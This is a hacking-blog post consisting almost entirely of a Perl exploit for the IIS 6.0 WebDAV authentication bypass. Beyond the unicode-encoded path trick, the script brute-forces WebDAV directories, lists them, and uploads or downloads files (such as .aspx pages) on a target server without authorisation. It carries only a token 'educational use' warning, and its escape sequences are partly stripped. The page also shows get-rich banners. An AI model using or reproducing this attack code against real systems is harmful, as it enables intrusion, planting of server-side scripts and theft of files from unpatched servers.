BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Sunday, January 29, 2012

MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl)

0 comments

#!/usr/bin/perl
#  ********* !!! WARNING !!! *********
#  *   FOR SECURITY TESTiNG ONLY!    *
#  ***********************************
#  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
#  v1.1 add brute force dir fuction. 2009-05-29
#  v1.0 download?upload and list dir. 2009-05-24
#
#  Usage:
#               IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
#               -target                                                         eg.: 192.168.1.1
#   -port                                                                       eg.: 80 
#   -method                                                             eg.: g
#    (p:PUT,g:GET,l:LIST)
#   -webdavpath                                         eg.: webdav 
#   -BruteForcePath                             eg.: brute force webdav path
#   -file       (optional)                      eg.: test.aspx
#  Example:
#               put a file:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
#               get a file:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
#               list dir:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
#               brute force + list dir:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
#               brute force + get file:
#                               IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
  use IO::Socket;
use Getopt::Long; 
use threads;
use threads::shared;
# Globals Go Here.
my $target;                             # Host being probed.
my $port;                                       # Webserver port.
my $method;                             # HTTP Method, PUT GET or .
my $xpath;                              # WebDAV path on Webserver.
my $bpath;                              # Bruteforce WebDAV path.
my $file;                                       # file name.
my $httpmethod;
my $Host_Header;        # The Host header has to be changed
GetOptions( 
        "target=s"      => $target,
        "port=i"        => $port,
        "method=s"      => $method,
        "xpath=s"       => $xpath,
        "bpath=s"       => $bpath,
        "file=s"        => $file,
        "help|?"        => sub { 
                                hello();
                                exit(0); 
                           } ); 

$error .= "Error: You must specify a target hostn" if ((!$target)); 
$error .= "Error: You must specify a target portn" if ((!$port)); 
$error .= "Error: You must specify a put,get or list methodn" if ((!$method)); 
$error .= "Error: You must specify a webdav pathn" if ((!$xpath) && (!$bpath)); 
$error .= "Error: You must specify a upload or download file namen" if ((!$file) && $method != "l"); 
if ($error) { 
        print "Try $0 -help or -?' for more information.n$errorn" ; 
        exit; } 

hello();
if ($method eq "p") {
        $httpmethod = "PUT";
} elsif ($method eq "g") {
  $httpmethod = "GET";
} elsif ($method eq "l") {
  $httpmethod = "PROPFIND";
} else {
  print "$method Method not accept !!!n";
  exit(0);
}
        # ************************************
# * We testing WebDAV methods first  *
# ************************************
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
if ($bpath) {
  $xpath = webdavbf($target,$port,$bpath);
}
#end of brute force
print "-" x 60 ."n";
if ($httpmethod eq "PUT") {
  my $content;
  my $data;
  #cacl file size
  $filesize = -s $file;
  print "$file size is $filesize bytesn";
  open(INFO, $file) || die("Could not open file!");
  #@lines=<INFO>;
  binmode(INFO); #binary
  while(read(INFO, $data, $filesize))
  { 
        $content .= $data;
  }
  close(INFO); 
  #print $content;
  
  $Host_Header = "Translate: frnHost: $targetrnContent-Length: $filesizern";
} elsif ($httpmethod eq "GET") {
        $Host_Header = "Translate: frnHost: $targetrnConnection: closernrn";
} elsif ($httpmethod eq "PROPFIND") {
        $Host_Header = "Host: $targetrnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
        $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
}
print "-" x 60 ."n$httpmethod $file , Please wait ...n"."-" x 60 ."n";
# ************************
# * Sending HTTP request *
# ************************
if ($httpmethod eq "PUT") {
  @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Headerrn$content",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $portn";}
} elsif ($httpmethod eq "GET") {
        @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $portn";}
} elsif ($httpmethod eq "PROPFIND") {
        @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0rn$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $portn";}
}
#print @results;
$flag="off";
if ($results[0] =~ m|^HTTP/1.[01] 2[0-9][0-9] |){
        $flag="on";
} elsif ($results[0] =~ m|^HTTP/1.[01] 4[0-9][0-9] |){
        $flag="off";
}       
print "-" x 60 ."n";
if ($flag eq "on") {
  if ($httpmethod eq "PUT") {
          print "$httpmethod $file from [$target:$port/$xpath] OKrn";
  } elsif ($httpmethod eq "GET") {
    my $line_no = 0;
    my $counter = @results;
    foreach $line (@results){
          ++$line_no;
            if ($line =~ /^Accept-Ranges: bytesrn/){
                  last;
            }
    }

    # Write file to disk
    open(OUTFILE, ">$file") or die "Could not write to file: $!n";
    binmode (OUTFILE);
    print OUTFILE @results[$line_no+1..$counter];
    close(OUTFILE);      
     
          print "$httpmethod $file from [$target:$port/$xpath] OKrnPlease check $file on local diskrn";   
          
  } elsif ($httpmethod eq "PROPFIND") {
    print "$httpmethod path list from [$target:$port/$xpath] OKrn";
        foreach $line (@results){
            if ($line =~ /^<?xml version=/i){
                  my @list = split("<a:href>", $line);
                  foreach $path (@list) {
                        $no = index($path,"<");
                        $result.=substr($path, 0, $no)."n";
                  }
                  print $result;
                  last;
            }
    }
  }
} else {
        print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!rn";
}
print "-" x 60 ."n";
exit(0);

# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
  my ($pstr,$realip,$realport,$timeout)=@_;
  my $target2 = inet_aton($realip);
  my $flagexit=0;
  $SIG{ALRM}=&ermm;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
  alarm($timeout);
  if (connect(S,pack "SnA4x8",2,$realport,$target2)){
    alarm(0);
    my @in;
    select(S); $|=1;
    print $pstr;
    alarm($timeout);
    while(<S>){
      if ($flagexit == 1){
        close (S);
        print STDOUT "Timeoutn";
        return "Timeout";
      }
      push @in, $_;
    }
    alarm(0);
    select(STDOUT);
    close(S);
    return @in;
  } else {return "0";}
}

sub ermm{
        $flagexit=1;
        close (S);
}

sub webdavtest {
        my ($testip,$testport)=@_;
  print "-" x 60 ."n";
  print "Testing WebDAV methods [$testip $testport]n";
  print "-" x 60 ."n";
  @results=sendraw2("OPTIONS / HTTP/1.0rnrn",$testip,$testport,10);
  if ($#results < 1){die "10s timeout to $target on port $testportn";}
  #print @results;
  $flag="off";
  foreach $line (@results){
          if ($line =~ /^Server: /){
                  ($left,$right)=split(/:/,$line);
                  $right =~ s/ //g; 
                  print "$target : Server type is : $right";

            if ($right !~ /Microsoft-IIS/i){
                    print "$target : Not a Microsoft IIS Servern";
                    exit(0);
            }
          }
        
          if ($line =~ /^DAV: /){
                  $flag="on";
          }
        
          if ($line =~ /^Public: / && $flag eq "on"){
            ($left,$right)=split(/:/,$line);
            $right =~ s/ //g; 
            print "$target : Method type is : $right";
            if ($right !~ /$httpmethod/i){
              print "$target : Not allow $httpmethod on this WebDAV Servern";
              exit(0);
            } else {
              $flag="on";
            }
          }             
  }
  if ($flag eq "off") {
    print "$target : WebDAV disablen";
    exit(0);    
  }
}

sub webdavbf {
        my ($bfip,$bfport,$bfpath)=@_;
  print "-" x 60 ."n";
  print "Try to brute forceing WebDAV path ...n";
  print "-" x 60 ."n";
  open(BF, $bfpath) || die("Could not open file!");
  foreach $lines (<BF>){
        chomp($lines);

          $Host_Header = "Host: $bfiprnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
          $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
          
          @results=sendraw2("PROPFIND /$lines/ HTTP/1.0rn$Host_Header",$bfip,$bfport,10);
    if ($#results < 1){die "10s timeout to $bfip on port $bfportn";}
    
    print "[$lines]...$results[0]";
    
        #maybe this response
        #HTTP/1.1 207 Multi-Status
    if ($results[0] =~ m|^HTTP/1.[01] 401 |){
        print "Find out path on [$lines]n";
            return $lines;
            last;
    }
  }
  close(BF) ;
  print "Sorry... We can not find any more path... :(n";
  exit(0);
}

sub hello{
  print "n"; 
  print "t ###################################################n"; 
  print "t #    MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0  #n"; 
  print "t #  **************** !!! WARNING !!! **************#n"; 
  print "t #  **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#n"; 
  print "t #  ***********************************************#n"; 
  print "t #  Written by csgcsg 2009-05-29                   #n"; 
  print "t ###################################################n"; 
  print "nt $0 -target -port -method -webdavpath [-file]n";
  print "nt -targetttt eg.: 192.168.1.1n"; 
  print "t -porttttt eg.: 80n"; 
  print "t -methodttt eg.: gn"; 
  print "t (p:PUT, g:GET, l:LIST)n";
  print "t -webdavpath|-bruteForcePatht eg.: webdavn"; 
  print "t -filetttt eg.: test.aspxnn"; 
  print "t Usage eg.: nt  $0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspxn"; };

©2011, copyright BLACK BURN

0 comments:

Post a Comment

 

7 Years Earning Experience

The Earning Source You Can Trust